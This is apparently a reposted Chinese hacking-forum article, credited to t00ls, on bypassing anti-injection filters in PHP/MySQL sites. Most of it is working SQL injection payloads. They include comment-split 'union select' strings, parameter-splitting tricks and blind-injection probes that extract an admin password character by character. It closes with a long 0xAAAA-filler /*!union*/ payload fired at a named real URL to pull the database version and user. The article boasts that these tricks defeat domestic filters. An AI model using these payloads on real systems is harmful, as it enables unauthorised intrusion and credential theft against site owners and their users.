SQL繞過注入最新代碼

自sql注入發展至今,許多安全文章彷佛扭曲了很多人的注射思惟,傳統的檢測注射方法是經過:
and 1=1 , and 1=2 來判斷真假從而判斷是否過濾徹底,固然,也有 or 1=2,or 1=1,或者
在數值注射 例如:id=1+1 或id=2-1,等等
本文的目的不是評判誰的檢測方法實用,只是向你們推薦一些新的注射方式,可能早有人說起了:)
注:主要針對php下的mysql注射,可借鑑,就不一一介紹了
首先說判斷:
Null值相信你們不陌生吧,可這麼用: and 1 is null,and 1 is not null
或: and 2<=3
其實,不少人習慣性的用=號來判斷了,可是,如: >= ,<= ,is null,is not null,<>等 均可用於判斷
接着說注入
對於注射取值,咱們熟悉的就是union select 和 blind sqlinjection(盲注)
先說Union Select
對於常規的注射,咱們能夠union select 1,2,3,4 或 union/**/select/**/ 1,2,3,4
Ok,看我演示, id=1+u/**/nio/**/n+se/**/lect+1&id=2,3&id=4 夠噁心吧?
可繞過國內全部防注射哦:) 這代碼運行後效果如上,至於原理我但願你們本身去
查查相關資料,有異議的可給我留言.
固然,在語句傳遞多個參數時 例如 slect * from table where id = 1 and name = xxx ,咱們可這麼作:
id=1+union/*&name=*/select+1,2
代入查詢後 slect * from table where id = 1 union /* and name = xxx */ select 1,2
這是一種讓常量(變量)失效的技巧,固然,環境要求比較苛刻
下面說說Blind SqlIjection(盲注)
通常方式,我想你們應該是這麼作的: ascii(substring(password,1,1))=56,或者是
ord(mid(password,1,1))=56
在此,我推薦你們仍是用子查詢,固然,前提是猜出表,字段,可更爲準確的獲得想獲得的數據
此前,仍然向你們推薦一些新型的手法:
find_in_set 例: find_in_set(’56′,ascii(substr(password,1,1)))=1
strcmp 例: strcmp(left(‘password’,1), 0×56) = 1
將這些函數套如子查詢就是:
id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×55)=1 false
id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×56)=0 true
id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×57)=-1 false
老外NB 方法 還有 -.-
悲劇仍是繞不過去,nnd。要是國內
的站以上幾種方法通常都能搞定,老外就是bt。國外php 注射歷史悠久手法獨特+方法猥瑣 射出概率至關高
http://www.2cto.com/index.php?content=more_product&id=-17 and (select 1)=(select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6–+-
靠,老外果真牛B 那麼繼續射
http://www.2cto.com/index.php?content=more_product&id=-17 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u ser()),3,4,5,6–+- 成功獲得系統版本、當前數據庫用戶、用戶名.BY:t00ls
相關文章
相關標籤/搜索